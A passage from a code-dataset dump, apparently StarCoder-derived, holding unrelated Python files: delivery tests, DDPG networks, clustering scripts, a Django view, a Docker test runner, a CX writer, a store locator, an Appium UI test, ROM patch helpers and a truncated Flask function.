'md5': 'd41d8cd98f00b204e9800998ecf8427e'\n }\n for f in ('p1_user_s_id2.g.vcf.gz', 'p1_user_s_id2.g.vcf.gz.tbi', 'p1_user_s_id2.vcf.gz',\n 'p1_user_s_id2.vcf.gz.tbi', 'p1_user_s_id2.bam', 'p1_user_s_id2.bam.bai')\n ]\n\n def test_deliver_data_split_real(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue,\\\n patch.object(d.DataDelivery, 'run_aggregate_commands'),\\\n 
patch('bin.deliver_reviewed_data.DataDelivery.mark_samples_as_released'):\n self.delivery_real_split_fluidx.deliver_data()\n assert os.listdir(self.dest_dir) == ['project2']\n today = datetime.date.today().isoformat()\n assert sorted(os.listdir(os.path.join(self.dest_dir, 'project2'))) == [today, 'all_md5sums.txt', 'summary_metrics.csv']\n assert sorted(os.listdir(os.path.join(self.dest_dir, 'project2', today))) == ['Fluidx1', 'Fluidx2']\n assert sorted(os.listdir(os.path.join(self.dest_dir, 'project2', today, 'Fluidx1'))) == sorted(self.final_files_split)\n\n assert sorted(\n self.delivery_real_split_fluidx.samples2files['p2sample1'],\n key=operator.itemgetter('file_path')\n ) == [\n {\n 'file_path': 'project2/%s/Fluidx1/%s' % (today, f),\n 'size': 0,\n 'md5': 'd41d8cd98f00b204e9800998ecf8427e'\n }\n for f in ['p2_user_s_id1.bam', 'p2_user_s_id1.bam.bai', 'p2_user_s_id1.g.vcf.gz',\n 'p2_user_s_id1.g.vcf.gz.tbi', 'p2_user_s_id1.vcf.gz', 'p2_user_s_id1.vcf.gz.tbi',\n 'raw_data/run1_el_s1_id3_R1.fastq.gz', 'raw_data/run1_el_s1_id3_R2.fastq.gz',\n 'raw_data/run1_el_s1_id4_R1.fastq.gz', 'raw_data/run1_el_s1_id4_R2.fastq.gz']\n\n ]\n\n def test_get_email_data(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue,\\\n patch.object(d.DataDelivery, 'today', new_callable=PropertyMock(return_value='2017-12-15')):\n exp = {\n 'num_samples': 2,\n 'release_batch': '2017-12-15',\n 'delivery_queue': 'http://testclarity.com/queue/999',\n 'project_id': 'test_project'\n }\n assert exp == self.delivery_dry_merged.get_email_data('test_project', ['sample1', 'sample2'])\n\n def test_send_reports(self):\n with patch_process, patch_get_document, patch_get_documents, patch_get_queue,\\\n patch('egcg_core.notifications.email.EmailSender._try_send') as mock_send_email:\n self.delivery_dry_merged.email = True\n _ = self.delivery_dry_merged.deliverable_samples\n self.delivery_dry_merged.send_reports(\n {'project1': [rest_responses['samples']['p1sample1'], rest_responses['samples']['p1sample2']]},\n {'test_project': os.path.join(self.assets_path, 'data_delivery', 'test_project_report.pdf')}\n )\n assert mock_send_email.call_count == 1\n assert type(mock_send_email.call_args_list[0][0][0]) == MIMEMultipart\n\n def test_resolve_process_id(self):\n assert d.resolve_process_id('http://test.com/path/to/step/20198') == '24-20198'\n assert d.resolve_process_id('http://test.com/api/2/steps/24-20198') == '24-20198'\n assert d.resolve_process_id('20198') == '24-20198'\n assert d.resolve_process_id('24-20198') == '24-20198'\n","sub_path":"tests/test_data_delivery.py","file_name":"test_data_delivery.py","file_ext":"py","file_size_in_byte":23486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"256107170","text":"import copy\nimport numpy as np\nimport random\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\ndef hidden_init(layer):\n fan_in = layer.weight.data.size()[0]\n lim = 1. 
/ np.sqrt(fan_in)\n return (-lim, lim)\n\nclass Actor(nn.Module):\n\n def __init__(self, state_size, action_size):\n super(Actor, self).__init__()\n self.seed = torch.manual_seed(seed=0)\n self.fc1 = nn.Linear(state_size, 1024)\n self.fc2 = nn.Linear(1024, 1024)\n self.fc3 = nn.Linear(1024, 512)\n self.fc4 = nn.Linear(512, 128)\n self.fc5 = nn.Linear(128, action_size)\n self.reset_parameters()\n self.to(device)\n\n\n def reset_parameters(self):\n self.fc1.weight.data.uniform_(*hidden_init(self.fc1))\n self.fc2.weight.data.uniform_(*hidden_init(self.fc2))\n self.fc3.weight.data.uniform_(*hidden_init(self.fc3))\n self.fc4.weight.data.uniform_(*hidden_init(self.fc4))\n self.fc5.weight.data.uniform_(-3e-3, 3e-3)\n\n def forward(self, state):\n x = F.leaky_relu(self.fc1(state))\n x = F.leaky_relu(self.fc2(x))\n x = F.leaky_relu(self.fc3(x))\n x = F.leaky_relu(self.fc4(x))\n return F.tanh(self.fc5(x))\n\n\nclass Critic(nn.Module):\n\n def __init__(self, state_size, action_size):\n super(Critic, self).__init__()\n self.seed = torch.manual_seed(seed=0)\n self.fcs1 = nn.Linear(state_size, 1024)\n self.fc2 = nn.Linear(1024 + action_size, 1024)\n self.fc3 = nn.Linear(1024, 1024)\n self.fc4 = nn.Linear(1024, 512)\n self.fc5 = nn.Linear(512, 1)\n self.reset_parameters()\n self.to(device)\n\n def reset_parameters(self):\n self.fcs1.weight.data.uniform_(*hidden_init(self.fcs1))\n self.fc2.weight.data.uniform_(*hidden_init(self.fc2))\n self.fc3.weight.data.uniform_(*hidden_init(self.fc3))\n self.fc4.weight.data.uniform_(*hidden_init(self.fc4))\n self.fc5.weight.data.uniform_(-3e-3, 3e-3)\n\n def forward(self, state, action):\n xs = F.leaky_relu(self.fcs1(state))\n x = torch.cat((xs, action), dim=1)\n x = F.leaky_relu(self.fc2(x))\n x = F.leaky_relu(self.fc3(x))\n x = F.leaky_relu(self.fc4(x))\n return self.fc5(x)\n\n\nclass OUNoise:\n \"\"\"Ornstein-Uhlenbeck process.\"\"\"\n\n def __init__(self, size, mu=0., theta=0.7, sigma=0.1):\n \"\"\"Initialize parameters and noise process.\"\"\"\n self.mu = mu * np.ones(size)\n self.theta = theta\n self.sigma = sigma\n self.reset()\n\n def reset(self):\n \"\"\"Reset the internal state (= noise) to mean (mu).\"\"\"\n self.state = copy.copy(self.mu)\n\n def sample(self):\n \"\"\"Update internal state and return it as a noise sample.\"\"\"\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state","sub_path":"ddpg_nets.py","file_name":"ddpg_nets.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"47849785","text":"# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.cluster import KMeans\n\n# Importing the dataset\ndataset = pd.read_csv(\n '~\\\\BOW_title_1000.tsv'\n , sep = '\\t'\n , encoding='utf-8'\n )\nX = dataset.iloc[:, 11:263].values\n####################################################\n# Kmeans\n# Using the elbow method to find the optimal number of clusters\nwcss = []\nfor i in range(1, 20):\n kmeans = KMeans(n_clusters = i, init = 'k-means++', random_state = 42)\n kmeans.fit(X)\n wcss.append(kmeans.inertia_)\nplt.plot(range(1, 20), wcss)\nplt.title('The Elbow Method')\nplt.xlabel('Number of clusters')\nplt.ylabel('WCSS')\nplt.show()\n\n# Fitting K-Means to the dataset\nkmeans = KMeans(n_clusters = 12, init = 'k-means++', random_state = 42)\ny_data = 
kmeans.fit_predict(X)\n####################################################\n# HC\n# Using the dendrogram to find the optimal number of clusters\nimport scipy.cluster.hierarchy as sch\ndendrogram = sch.dendrogram(sch.linkage(X, method = 'ward'))\nplt.title('Dendrogram')\nplt.xlabel('BOW')\nplt.ylabel('Euclidean distances')\nplt.show()\n\n# Fitting Hierarchical Clustering to the dataset\nfrom sklearn.cluster import AgglomerativeClustering\nhc = AgglomerativeClustering(n_clusters = 8, affinity = 'euclidean', linkage = 'ward')\ny_data = hc.fit_predict(X)\n####################################################\n# Add clusters to initial dataset\nclusters = np.asarray(y_data)\ndataset['cluster'] = clusters\namazonjobs_df = dataset.iloc[:, 1:11]\namazonjobs_df['cluster'] = clusters\n\n# Export results to tsv\nimport os\namazonjobs_df.to_csv('Results_.tsv', sep='\\t', encoding='utf-8')\nprint('>>>>>> Result exported: ' + f'{os.getcwd()}\\Results_.tsv')\n","sub_path":"clustering_kmeans _hc.py","file_name":"clustering_kmeans _hc.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"133685452","text":"import sqlite3\r\n\r\nconn = sqlite3.connect('example.db')\r\nc = conn.cursor()\r\n\r\nc.execute('CREATE TABLE user (name text, email text)')\r\n\r\nc.execute(\"INSERT INTO user VALUES ('Mike', 'mike@mike.com')\")\r\n\r\nconn.commit()\r\nconn.close()","sub_path":"sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"566526485","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nimport json\n\n# Function will build the json response based on the data provided\ndef build_res(stat, mess, data=None):\n res = {\"quotes\": data, \"status\": stat, \"message\": mess}\n\n return JsonResponse(res, content_type=\"application/json\")\n\n# Quotes route will respond with the quotes provided in the quotes.json file\ndef quotes(request):\n fs = None\n data = None\n str = None\n\n # Attempt to open the file\n try:\n fs = open('/Users/kgluce/Documents/git/punny-foie-gras/quotes.json')\n except:\n return build_res(False, \"Error: Couldn't open quotes.json\")\n\n # Attempt to read the file\n try:\n str = fs.read()\n except:\n fs.close()\n return build_res(False, \"Error: Couldn't read the quotes.json\")\n fs.close()\n\n # Attempt to convert JSON string to python objects\n try:\n data = json.loads(str)[\"quotes\"]\n except:\n return build_res(False, \"Error: Malformed JSON string\")\n\n # Made it! 
Return the correct data/status\n return build_res(True, \"Success: Loaded JSON data\", data=data)\n\n","sub_path":"punnyBackend/quotes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"340229428","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom subprocess import check_call\nimport sys\nimport os\nimport logging\nimport yaml\nimport click\nimport click_log\nfrom .utils import (\n assert_image_tag_from_dockerfile,\n find_matrix_from_dockerfile,\n gen_version_target_from_tag\n)\n\nlogger = logging.getLogger(__name__)\n\n\n@click.command()\n@click.argument('dockerfile')\n@click_log.simple_verbosity_option()\n@click_log.init(__name__)\ndef test(dockerfile):\n image_tag = assert_image_tag_from_dockerfile(logger, dockerfile)\n matrix_yml_path = find_matrix_from_dockerfile(dockerfile)\n project_dir = os.path.dirname(matrix_yml_path)\n\n if not os.path.exists(matrix_yml_path):\n logger.error('matrix.yml not found in project dir: %s', project_dir)\n sys.exit(1)\n\n # switch to the project dir where matrix.yml is located; we assume test files\n # are located relative to matrix.yml\n os.chdir(project_dir)\n\n with open(matrix_yml_path) as matrix_fobj:\n matrix = yaml.safe_load(matrix_fobj)\n\n version, target = gen_version_target_from_tag(image_tag)\n if version not in matrix:\n logger.error('version %s not found in matrix.', version)\n sys.exit(1)\n\n version_cfg = matrix[version]\n if target not in version_cfg:\n logger.error('target %s not found in version %s', target, version)\n sys.exit(1)\n\n target_cfg = version_cfg[target]\n test_script = target_cfg.get('_test')\n if not test_script:\n logger.info('No test found for image %s, skipped.', dockerfile)\n sys.exit(0)\n\n test_script = os.path.abspath(test_script)\n if not os.path.exists(test_script):\n logger.info('Defined test script (%s) not found for image %s.',\n test_script, image_tag)\n sys.exit(1)\n\n logger.info('--------------------------------------------')\n logger.info('[*] Testing image %s with script %s...',\n image_tag, test_script)\n logger.info('--------------------------------------------')\n\n # Spin up a docker container to test the given image. 
Here, we mount the\n # directory where the test files live into /build_test path inside the\n # container (-v) so the container has access to all test files\n cmds = ['docker', 'run',\n '-v', '%s:/build_test' % os.path.dirname(test_script),\n image_tag,\n 'bash', '-c',\n 'cd /build_test && bash %s' % os.path.basename(test_script)]\n logger.debug('running test docker command: %s', cmds)\n check_call(cmds)\n","sub_path":"floydker/src/floydker/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"507255538","text":"# -*- coding:utf-8 -*-\n# @Desc:\n# @Author: Administrator\n# @Date: 2018-04-29 11:46\n\n# Syntax of a while loop:\n# while condition:\n# thing 1 to do while the condition holds...\n# thing 2 to do while the condition holds...\n# thing 3 to do while the condition holds...\n\n### Exercise: compute the cumulative sum of 1-100\nnum = 1\nsum = 0\nwhile num <= 100 :\n sum += num\n num += 1\nprint(\"Cumulative sum of 1-100: %d\"%sum)\n\n\n","sub_path":"01.PythonDoc/02.控制流程语句/02.while循环的用法.py","file_name":"02.while循环的用法.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"332615696","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# liczby 2-3.py\n\n\ndef liczby2():\n \"\"\"\n Prints all two-digit numbers\n whose digits do not repeat\n and returns the count of such numbers;\n we do not print: 11, 22, 33, 44, etc.\n \"\"\"\n ile = 0 # count of numbers\n\n for i in range(1, 10): # tens loop\n for j in range(0, 10): # units loop\n if i != j:\n print(\"{}{} \".format(i, j), end=\"\")\n ile += 1\n return ile\n\n\ndef liczby3():\n \"\"\"\n Prints all three-digit numbers\n whose digits do not repeat\n and returns the count of such numbers;\n we do not print: 111, 222, 112, 323, etc.\n \"\"\"\n ile = 0 # count of numbers\n\n for i in range(1, 10): # hundreds loop\n for j in range(0, 10): # tens loop\n for k in range(0, 10): # units loop\n if i!=j and i!=k and j!=k:\n print(\"{}{}{} \".format(i, j, k), end=\"\")\n ile += 1\n return ile\n\n\ndef main(args):\n print(\"2-digit numbers:\", liczby2())\n print(\"3-digit numbers:\", liczby3())\n return 0\n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n","sub_path":"python/liczby-23.py","file_name":"liczby-23.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"142734993","text":"import json\nimport decimal\nimport collections\nfrom cxio.cx_constants import CxConstants\n\n\nclass CxWriter(object):\n\n def __init__(self, out):\n if out is None:\n raise AssertionError('output stream must not be none')\n self.__out = out\n self.__pre_meta_data = []\n self.__post_meta_data = []\n self.__aspect_element_counts = {}\n self.__started = False\n self.__ended = False\n self.__fragment_started = False\n self.__first = True\n self.__in_fragment = False\n\n def add_pre_meta_data(self, pre_meta_data):\n if pre_meta_data is None:\n raise AssertionError('pre meta data must not be none')\n if self.__ended:\n raise IOError('already ended')\n if self.__started:\n raise IOError('already started')\n self.__add_meta_data(self.__pre_meta_data, pre_meta_data)\n\n def add_post_meta_data(self, post_meta_data):\n if post_meta_data is None:\n raise AssertionError('post meta data must not be none')\n if self.__ended:\n raise IOError('already ended')\n self.__add_meta_data(self.__post_meta_data, post_meta_data)\n\n def start(self):\n if self.__ended:\n raise 
IOError('already ended')\n if self.__started:\n raise IOError('already started')\n self.__started = True\n self.__out.write('[')\n if len(self.__pre_meta_data) > 0:\n self.__write_meta_data(self.__pre_meta_data)\n\n def end(self):\n if self.__ended:\n raise IOError('already ended')\n if not self.__started:\n raise IOError('not started')\n if self.__fragment_started:\n raise IOError('fragment not ended')\n if len(self.__post_meta_data) > 0:\n self.__write_meta_data(self.__post_meta_data)\n self.__ended = True\n self.__started = False\n self.__out.write('\\n')\n self.__out.write(']')\n\n def start_aspect_fragment(self, aspect_name):\n if aspect_name is None:\n raise AssertionError('aspect name data must not be none')\n if self.__ended:\n raise IOError('already ended')\n if not self.__started:\n raise IOError('not started')\n if self.__fragment_started:\n raise IOError('fragment already started')\n self.__fragment_started = True\n if self.__first:\n self.__first = False\n else:\n self.__out.write(', ')\n self.__out.write('\\n')\n self.__out.write(' { ')\n self.__out.write('\"')\n self.__out.write(aspect_name)\n self.__out.write('\"')\n self.__out.write(':')\n self.__out.write(' ')\n self.__out.write('[')\n self.__out.write(' ')\n self.__out.write('\\n')\n\n def end_aspect_fragment(self):\n if self.__ended:\n raise IOError('already ended')\n if not self.__fragment_started:\n raise IOError('fragment not started')\n self.__fragment_started = False\n self.__out.write(' ')\n self.__out.write(']')\n self.__out.write('\\n')\n self.__out.write(' }')\n self.__in_fragment = False\n\n def write_aspect_element(self, element):\n if self.__ended:\n raise IOError('already ended')\n if not self.__fragment_started:\n raise IOError('fragment not started')\n if self.__in_fragment is True:\n self.__out.write(', ')\n self.__out.write('\\n')\n self.__out.write(' ')\n self.__out.write(self.__aspect_element_to_json(element))\n self.__in_fragment = True\n my_name = element.get_name()\n if my_name not in self.__aspect_element_counts:\n self.__aspect_element_counts[my_name] = 1\n else:\n self.__aspect_element_counts[my_name] += 1\n\n def __write_meta_data(self, meta_data):\n self.start_aspect_fragment(CxConstants.META_DATA)\n for e in meta_data:\n self.write_aspect_element(e)\n self.end_aspect_fragment()\n\n def get_aspect_element_counts(self):\n return self.__aspect_element_counts\n\n @staticmethod\n def __aspect_element_to_json(aspect_element):\n return json.dumps(aspect_element.get_data(), cls=DecimalEncoder)\n\n @staticmethod\n def __add_meta_data(meta_data, add_me):\n if isinstance(add_me, collections.Iterable):\n meta_data.extend(add_me)\n else:\n meta_data.append(add_me)\n\n\nclass DecimalEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n return float(o)\n return super(DecimalEncoder, self).default(o)\n\n\n","sub_path":"cxio/cx_writer.py","file_name":"cx_writer.py","file_ext":"py","file_size_in_byte":4691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"281126255","text":"#!/usr/bin/env python3\n\nimport json\nimport argparse\nimport logging\n\nfrom store import search_store\n\n\ndef get_arguments():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--zip\", type=int, help=\"Find nearest store to this zip code. If there are multiple best-matches, return the first.\")\n\tparser.add_argument(\"--address\", type=str, help=\"Find nearest store to this address. 
If there are multiple best-matches, return the first.\")\n\tparser.add_argument(\"--output\", type=str, help=\"Output in human-readable text, or in JSON (e.g. machine-readable) [default: text]\", default='text')\n\tparser.add_argument(\"--units\", type=str, help=\"Display units in miles or kilometers [default: mi]\", default='mi')\n\t# main() passes args.google_api_key to search_store(), so the flag must be defined here\n\tparser.add_argument(\"--google_api_key\", type=str, help=\"Google API key used when looking up the nearest store.\", default=None)\n\targs = parser.parse_args()\n\n\tif args.zip is None and args.address is None:\n\t\tlogging.error(\"You need to request at least one location parameter: zip or address.\")\n\t\treturn None\n\n\tif args.units not in [\"mi\", \"km\"]:\n\t\tlogging.error(\"Please specify a correct unit format. Available formats: 'km' and 'mi'.\")\n\t\treturn None\n\n\tif args.output not in [\"text\", \"json\"]:\n\t\tlogging.error(\"Please specify a correct output format. Available formats: 'text' and 'json'.\")\n\t\treturn None\n\n\treturn args\n\n\ndef main():\n\targs = get_arguments()\n\tif args is None:\n\t\treturn\n\n\trecord = search_store(args.address or args.zip, args.google_api_key)\n\tif not record:\n\t\treturn\n\n\tprint_output(record, args.output, args.units)\n\n# function for printing the output in the requested format\n# default: text Here's the nearest store details:\n# \t\t\t\t\tstore name: San Francisco West, \n# \t\t\t\t\tstore address: SEC Geary Blvd. and Masonic Avenue 2675 Geary Blvd San Francisco CA 94118-3400,\n# \t\t\t\t\tdistance from requested address: 1.449589mi\n# optional: json {\"store_name\": \"San Francisco West\", \"store_location\": \"SEC Geary Blvd. and Masonic Avenue\", \n# \t\t\t\t\t\"address\": \"2675 Geary Blvd\", \"city\": \"San Francisco\", \"state\": \"CA\", \"zip_code\": \"94118-3400\", \n#\t\t\t\t\t\"latitude\": \"37.7820964\", \"longitude\": \"-122.4464697\", \"county\": \"San Francisco County\", \n#\t\t\t\t\t\"distance\": 1.4495892592265038}\ndef print_output(record, output, units):\n\t[column_names, distance, store] = record\n\t# coefficient to convert km to mi\n\tkm_to_miles = 0.621371\n\tdistance = distance if units == \"km\" else distance * km_to_miles\n\tif output == 'text':\n\t\tprint('Here\\'s the nearest store details:\\n store name: %s, \\n store address: %s, \\\n\t\t\t\\n distance from requested address: %f%s' %(store[0], ' '.join(store[1:6]), distance, units))\n\telse:\n\t\tresult = {column_names[i].lower().replace(' ', '_') : store[i] for i in range(len(column_names))}\n\t\tresult['distance'] = distance\n\t\tresult['units'] = units\n\t\tresult_json = json.dumps(result)\n\t\tprint(result_json)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"446801063","text":"# -*- coding:utf-8 -*-\n\nfrom appium import webdriver\n\nimport time\nfrom Appium_ import testFordata\n\nimport os\n\n\n# fetch the app's desired capabilities; get ready for the test\ndesired_caps = testFordata.readyForTest()\n\n\ndef test():\n driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps) # start the Remote RPC session\n \n try:\n \n time.sleep(5) # sleep long enough for the target screen to appear\n driver.find_element_by_id('com.pingan.mifi:id/tv_enjoy').click()\n driver.find_element_by_id('com.pingan.mifi:id/edittext').send_keys('17091640310')\n time.sleep(1)\n driver.find_element_by_id('com.pingan.mifi:id/et_password').send_keys('3507')\n \n os.system('adb shell input keyevent 4')# back key, dismiss the soft keyboard\n \n time.sleep(2)\n driver.find_element_by_id('com.pingan.mifi:id/btn_fast_login').click()\n # textfields.send_keys('17091640310')\n \n time.sleep(2)\n os.system('adb shell input keyevent 4') # 
back key, dismiss the soft keyboard\n # switch to the music tab\n driver.find_element_by_id('com.pingan.mifi:id/tv_music').click()\n time.sleep(2)\n # switch to the services tab\n driver.find_element_by_id('com.pingan.mifi:id/tv_redPaper').click()\n time.sleep(2)\n # switch to the \"mine\" tab\n driver.find_element_by_id('com.pingan.mifi:id/tv_mine').click()\n \n \n except Exception as e:\n testFordata.logger.cri(e)\n testFordata.logger.cri('Appium ran into an error!!')\n driver.quit()\n \n\ntest()","sub_path":"Appium_/testMIFI.py","file_name":"testMIFI.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"474232982","text":"import itertools\r\nfrom .exceptions import alttprException\r\n\r\n\r\ndef apply(rom, patches):\r\n    \"\"\"Applies a patch, which is a list of dictionaries\r\n\r\n    Arguments:\r\n        rom {list} -- A list of bytes depicting the ROM data to be patched.\r\n        patches {list} -- A list of dictionaries that depict a set of patches to be applied to the ROM.\r\n\r\n    Returns:\r\n        list -- a list of bytes depicting the patched rom\r\n    \"\"\"\r\n    for patch in patches:\r\n        offset = int(list(patch.keys())[0])\r\n        patch_values = list(patch.values())[0]\r\n        for idx, value in enumerate(patch_values):\r\n            rom[offset + idx] = value\r\n    return rom\r\n\r\ndef heart_speed(speed='half'):\r\n    \"\"\"Set the low-health warning beep interval.\r\n\r\n    Keyword Arguments:\r\n        speed {str} -- Choose the speed at which the low health warning beeps.\r\n            Options are 'off', 'double', 'normal', 'half', and 'quarter'. (default: {'half'})\r\n\r\n    Returns:\r\n        list -- a list of dictionaries indicating which ROM address offsets to write and what to write to them\r\n    \"\"\"\r\n    if speed is None:\r\n        speed = 'normal'\r\n    sbyte = {\r\n        'off': 0,\r\n        'double': 16,\r\n        'normal': 32,\r\n        'half': 64,\r\n        'quarter': 128,\r\n    }\r\n    patch = [{\r\n        '1572915': [sbyte[speed]]\r\n    }]\r\n    return patch\r\n\r\ndef heart_color(color='red'):\r\n    \"\"\"Set the color of the hearts on the player's HUD.\r\n\r\n    Keyword Arguments:\r\n        color {str} -- The heart color.  Options are 'red', 'blue', 'green', and 'yellow' (default: {'red'})\r\n\r\n    Returns:\r\n        list -- a list of dictionaries indicating which ROM address offsets to write and what to write to them\r\n    \"\"\"\r\n\r\n    if color is None:\r\n        color = 'red'\r\n    cbyte = {\r\n        'blue': [44, 13],\r\n        'green': [60, 25],\r\n        'yellow': [40, 9],\r\n        'red': [36, 5],\r\n    }\r\n    byte = cbyte[color][0]\r\n    file_byte = cbyte[color][1]\r\n    patch = [\r\n        {'457246': [byte]},\r\n        {'457248': [byte]},\r\n        {'457250': [byte]},\r\n        {'457252': [byte]},\r\n        {'457254': [byte]},\r\n        {'457256': [byte]},\r\n        {'457258': [byte]},\r\n        {'457260': [byte]},\r\n        {'457262': [byte]},\r\n        {'457264': [byte]},\r\n        {'415073': [file_byte]},\r\n    ]\r\n    return patch\r\n\r\ndef music(music=True):\r\n    \"\"\"Enables, or disables, the in-game music.  Useful if you want to use an MSU-1 soundtrack instead.\r\n\r\n    Keyword Arguments:\r\n        music {bool} -- If true, music is enabled.  If false, the music is disabled. 
(default: {True})\r\n\r\n    Returns:\r\n        list -- a list of dictionaries indicating which ROM address offsets to write and what to write to them\r\n    \"\"\"\r\n\r\n    return [{'1573402': [0 if music else 1]}]\r\n\r\n\r\ndef quickswap(quickswap=False):\r\n    return [{'1572939': [1 if quickswap else 0]}]\r\n\r\n\r\ndef menu_speed(speed='normal'):\r\n    if speed is None:\r\n        speed = 'normal'\r\n    sbyte = {\r\n        'instant': 0xE8,\r\n        'fast': 0x10,\r\n        'normal': 0x08,\r\n        'slow': 0x04\r\n    }\r\n    patch = [\r\n        {'1572936': [sbyte[speed]]},\r\n        {'449946': [0x20 if speed == 'instant' else 0x11]},\r\n        {'450346': [0x20 if speed == 'instant' else 0x12]},\r\n        {'450793': [0x20 if speed == 'instant' else 0x12]}\r\n    ]\r\n    return patch\r\n\r\ndef sprite(spr):\r\n    \"\"\"Creates a patch to replace Link's sprite with the contents of a ZSPR or SPR file.\r\n\r\n    Arguments:\r\n        spr {list} -- a list of bytes that depicts a ZSPR or SPR file\r\n\r\n    Returns:\r\n        list -- a list of dictionaries indicating which ROM address offsets to write and what to write to them\r\n    \"\"\"\r\n\r\n    if spr[:4] == [90, 83, 80, 82]:\r\n        # stolen from VT's code\r\n        gfx_offset = spr[12] << 24 | spr[11] << 16 | spr[10] << 8 | spr[9]\r\n        palette_offset = spr[18] << 24 | spr[17] << 16 | spr[16] << 8 | spr[15]\r\n        patch = [\r\n            {'524288': spr[gfx_offset:gfx_offset + 28671]},\r\n            {'905992': spr[palette_offset:palette_offset + 120]},\r\n            {'912885': spr[palette_offset + 120:palette_offset + 120 + 3]}\r\n        ]\r\n    # Else treat it like a SPR file instead\r\n    else:\r\n        patch = [\r\n            {'524288': spr[0:28671]},\r\n            {'905992': spr[28672:28791]},\r\n            {\r\n                '912885': [\r\n                    spr[28726],\r\n                    spr[28727],\r\n                    spr[28756],\r\n                    spr[28757],\r\n                ]\r\n            }\r\n        ]\r\n    return patch\r\n\r\ndef checksum(rom):\r\n    \"\"\"Writes a patch that fixes a ROM's checksum. 
This should be the last patch applied to a ROM before it is written.\r\n\r\n    Arguments:\r\n        rom {list} -- a list of bytes depicting the rom\r\n\r\n    Returns:\r\n        list -- a list of dictionaries indicating which ROM address offsets to write and what to write to them\r\n    \"\"\"\r\n\r\n    sum_of_bytes = sum(rom[:32731]) + sum(rom[32736:])\r\n    checksum = (sum_of_bytes + 510) & 65535\r\n    inverse = checksum ^ 65535\r\n    patch = [\r\n        {\r\n            '32732': [\r\n                inverse & 255,\r\n                inverse >> 8,\r\n                checksum & 255,\r\n                checksum >> 8,\r\n            ]\r\n        }\r\n    ]\r\n    return patch\r\n\r\ndef expand(rom, newlenmb):\r\n    \"\"\"Expands the byte list of a ROM to the specified number of megabytes, filling in the new space with zeroes.\r\n\r\n    Arguments:\r\n        rom {list} -- a list of bytes depicting the rom\r\n\r\n    Keyword Arguments:\r\n        newlenmb {int} -- The size, in megabytes, that the ROM should be.\r\n\r\n    Raises:\r\n        alttprException -- Raised if the new length is shorter than the current size of the byte list.\r\n\r\n    Returns:\r\n        list -- a list of bytes depicting the rom\r\n    \"\"\"\r\n\r\n    newlen = int(newlenmb) * 1024 * 1024\r\n    if len(rom) > newlen:\r\n        raise alttprException('ROM is already larger than {bytes}'.format(\r\n            bytes=newlen\r\n        ))\r\n    diff = len(rom) - newlen\r\n    if diff > 0:\r\n        rom[newlen] = 0\r\n    else:\r\n        rom.extend(itertools.repeat(0, -diff))\r\n        rom.append(0)\r\n    return rom\r\n","sub_path":"pyz3r/patch.py","file_name":"patch.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"491437796","text":"\n# -*- coding: utf-8 -*-\nimport os\nimport sys\n\nfrom flask import request\nfrom sqlalchemy import create_engine\n\nfrom AUSYS.log import log\n\nfrom AUUSE.get_user_info_from_key import get_user_info_from_key\nfrom AUUSE.set_user_API_req import set_user_API_req\n\nfrom etc.set_log import set_log\nfrom etc.set_send import set_send\nfrom etc.check_text import check_text\nfrom config.config_set import db_data\n\n# Function that looks up a recognition-module post\n# user_key : key of the user calling the API\n# log_request : request code (viewing module details, or fetching info when editing a module)\n# module_index : index of the module post to look up\ndef get_module_info(user_key, log_request, module_index):\n\n    # Values used for logging\n    # user_ip : IP of the user who called the API\n    # user_id : ID of the user who called the API\n    user_ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)\n    user_id = None\n    # Set up Python's logging\n    logger = set_log()\n    # Add the collected user_ip and user_id to the log context\n    logger_data = {'clientip': user_ip, 'user_id': user_id}\n    logger.info(\"Request get_module_info\", extra=logger_data)\n\n    request_log = \"get_module_info\"\n\n    # Record the user's most recent API request\n    set_user_API_req(user_key, request_log)\n    logger.info(\"Request set_user_API_req\", extra=logger_data)\n\n    # 